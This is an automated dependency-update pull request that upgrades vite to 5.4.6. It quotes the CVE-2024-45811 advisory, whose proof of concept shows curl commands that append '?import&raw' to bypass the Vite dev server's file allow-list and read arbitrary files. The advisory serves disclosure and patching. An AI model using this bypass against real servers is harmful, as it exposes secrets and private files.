jill64 / sentry-sveltekit-cloudflare

♟️ Unofficial Sentry Integration for SvelteKit Cloudflare Adapter
https://npmjs.com/package/@jill64/sentry-sveltekit-cloudflare
MIT License

chore(deps): update dependency vite to v5.4.6 [security] #692

Open renovate[bot] opened 1 month ago

renovate[bot] commented 1 month ago

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| vite (source) | 5.4.2 -> 5.4.6 | age | adoption | passing | confidence |

GitHub Vulnerability Alerts

CVE-2024-45811

Summary

The contents of arbitrary files can be returned to the browser.

Details

`@fs` denies access to files outside of the Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.

PoC

```sh
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url "/tmp/secret.txt" is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```

Release Notes

vitejs/vite (vite)

### [`v5.4.6`](https://redirect.github.com/vitejs/vite/releases/tag/v5.4.6)

[Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.5...v5.4.6)

Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v5.4.6/packages/vite/CHANGELOG.md) for details.

### [`v5.4.5`](https://redirect.github.com/vitejs/vite/releases/tag/v5.4.5)

[Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.4...v5.4.5)

Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v5.4.5/packages/vite/CHANGELOG.md) for details.

### [`v5.4.4`](https://redirect.github.com/vitejs/vite/releases/tag/v5.4.4)

[Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.3...v5.4.4)

Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v5.4.4/packages/vite/CHANGELOG.md) for details.

### [`v5.4.3`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small543-2024-09-03-small)

[Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.2...v5.4.3)

- fix: allow getting URL of JS files in publicDir ([#17915](https://redirect.github.com/vitejs/vite/issues/17915)) ([943ece1](https://redirect.github.com/vitejs/vite/commit/943ece177e7709b3ba574e810afce347c51d4442)), closes [#17915](https://redirect.github.com/vitejs/vite/issues/17915)
- fix: cjs warning respect the logLevel flag ([#17993](https://redirect.github.com/vitejs/vite/issues/17993)) ([dc3c14f](https://redirect.github.com/vitejs/vite/commit/dc3c14f39fcd57867c8ae81b75ae768b53b4b880)), closes [#17993](https://redirect.github.com/vitejs/vite/issues/17993)
- fix: improve CJS warning trace information ([#17926](https://redirect.github.com/vitejs/vite/issues/17926)) ([5c5f82c](https://redirect.github.com/vitejs/vite/commit/5c5f82c84bb64309875b42eee9d4dd525ab42e8c)), closes [#17926](https://redirect.github.com/vitejs/vite/issues/17926)
- fix: only remove entry assets handled by Vite core ([#17916](https://redirect.github.com/vitejs/vite/issues/17916)) ([ebfaa7e](https://redirect.github.com/vitejs/vite/commit/ebfaa7e6019783f308db5e759a6a67abb7cc626c)), closes [#17916](https://redirect.github.com/vitejs/vite/issues/17916)
- fix: waitForRequestIdle locked ([#17982](https://redirect.github.com/vitejs/vite/issues/17982)) ([ad13760](https://redirect.github.com/vitejs/vite/commit/ad1376018a94b42540a8488d897cc520849e1228)), closes [#17982](https://redirect.github.com/vitejs/vite/issues/17982)
- fix(css): fix directory index import in sass modern api ([#17960](https://redirect.github.com/vitejs/vite/issues/17960)) ([9b001ba](https://redirect.github.com/vitejs/vite/commit/9b001baa70c8489ac5550107c110a5dca281cda4)), closes [#17960](https://redirect.github.com/vitejs/vite/issues/17960)
- fix(css): fix sass `file://` reference ([#17909](https://redirect.github.com/vitejs/vite/issues/17909)) ([561b940](https://redirect.github.com/vitejs/vite/commit/561b940f6f963fbb78058a6e23b4adad53a2edb9)), closes [#17909](https://redirect.github.com/vitejs/vite/issues/17909)
- fix(css): fix sass modern source map ([#17938](https://redirect.github.com/vitejs/vite/issues/17938)) ([d428e7e](https://redirect.github.com/vitejs/vite/commit/d428e7e3a05f8da5ea00bb1b6a0827a5cc225899)), closes [#17938](https://redirect.github.com/vitejs/vite/issues/17938)
- fix(deps): bump tsconfck ([#17990](https://redirect.github.com/vitejs/vite/issues/17990)) ([8c661b2](https://redirect.github.com/vitejs/vite/commit/8c661b20e92f33eb2e3ba3841b20dd6f6076f1ef)), closes [#17990](https://redirect.github.com/vitejs/vite/issues/17990)
- fix(html): rewrite assets url in